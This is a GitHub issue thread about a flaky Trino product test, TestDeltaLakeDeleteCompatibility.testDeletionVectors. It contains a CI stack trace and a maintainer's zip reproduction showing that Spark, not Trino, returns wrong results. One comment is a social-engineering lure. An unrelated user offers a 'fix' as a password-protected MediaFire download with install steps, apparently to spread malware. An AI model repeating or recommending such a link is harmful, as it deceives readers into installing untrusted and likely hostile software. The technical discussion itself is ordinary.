### ISSUE TITLE
Flaky TestDeltaLakeDeleteCompatibility.testDeletionVectors 

### ISSUE THREAD

**Issue by ebyhr** [trinodb/trino#23229]
https://github.com/trinodb/trino/actions/runs/10654242163/job/29530504757

```
tests               | 2024-09-01 19:52:55 WARNING: not retrying; stacktrace does not match pattern '\Q[Databricks][\E(DatabricksJDBCDriver|JDBCDriver)\Q](500593) Communication link failure. Failed to connect to server. Reason: \E((HTTP retry after response received with no Retry-After header, error: HTTP Response code: 503|HTTP Response code: 504), Error message: Unknown.|java.net.SocketTimeoutException: Read timed out.)': [java.lang.AssertionError: Expected row count to be <2>, but was <3>; rows=[[1, 11], [30, -1], [2, -1]]
tests               | 	at io.trino.tests.product.deltalake.TestDeltaLakeDeleteCompatibility.testDeletionVectors(TestDeltaLakeDeleteCompatibility.java:265)
tests               | 	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103)
tests               | 	at java.base/java.lang.reflect.Method.invoke(Method.java:580)
tests               | 	at org.testng.internal.MethodInvocationHelper.invokeMethod(MethodInvocationHelper.java:104)
tests               | 	at org.testng.internal.Invoker.invokeMethod(Invoker.java:645)
tests               | 	at org.testng.internal.Invoker.invokeTestMethod(Invoker.java:851)
tests               | 	at org.testng.internal.Invoker.invokeTestMethods(Invoker.java:1177)
tests               | 	at org.testng.internal.TestMethodWorker.invokeTestMethods(TestMethodWorker.java:129)
tests               | 	at org.testng.internal.TestMethodWorker.run(TestMethodWorker.java:112)
tests               | 	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
tests               | 	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
tests               | 	at java.base/java.lang.Thread.run(Thread.java:1570)
tests               | ]
tests               | 2024-09-01 19:52:55 INFO: Test io.trino.tests.product.deltalake.TestDeltaLakeDeleteCompatibility.testDeletionVectors [none] took 49.84s
tests               | 2024-09-01 19:52:55 INFO: FAILURE     /    io.trino.tests.product.deltalake.TestDeltaLakeDeleteCompatibility.testDeletionVectors [none] (Groups: profile_specific_tests, delta-lake-exclude-91, delta-lake-databricks, delta-lake-oss) took 49.9 seconds
tests               | 2024-09-01 19:52:55 SEVERE: Failure cause:
tests               | java.lang.AssertionError: Expected row count to be <2>, but was <3>; rows=[[1, 11], [30, -1], [2, -1]]
tests               | 	at io.trino.tests.product.deltalake.TestDeltaLakeDeleteCompatibility.testDeletionVectors(TestDeltaLakeDeleteCompatibility.java:265)
tests               | 	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103)
tests               | 	at java.base/java.lang.reflect.Method.invoke(Method.java:580)
tests               | 	at org.testng.internal.MethodInvocationHelper.invokeMethod(MethodInvocationHelper.java:104)
tests               | 	at org.testng.internal.Invoker.invokeMethod(Invoker.java:645)
tests               | 	at org.testng.internal.Invoker.invokeTestMethod(Invoker.java:851)
tests               | 	at org.testng.internal.Invoker.invokeTestMethods(Invoker.java:1177)
tests               | 	at org.testng.internal.TestMethodWorker.invokeTestMethods(TestMethodWorker.java:129)
tests               | 	at org.testng.internal.TestMethodWorker.run(TestMethodWorker.java:112)
tests               | 	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
tests               | 	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
tests               | 	at java.base/java.lang.Thread.run(Thread.java:1570)
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ebyhr** [comment]
[delta_dv_incorrect_result.zip](https://github.com/user-attachments/files/16831422/delta_dv_incorrect_result.zip)

**Comment by ebyhr** [comment]
[delta_dv_incorrect_result.zip](https://github.com/user-attachments/files/16831857/delta_dv_incorrect_result.zip) returns the different results between Trino and Spark. Spark returns incorrect results while Trino returns correct results.
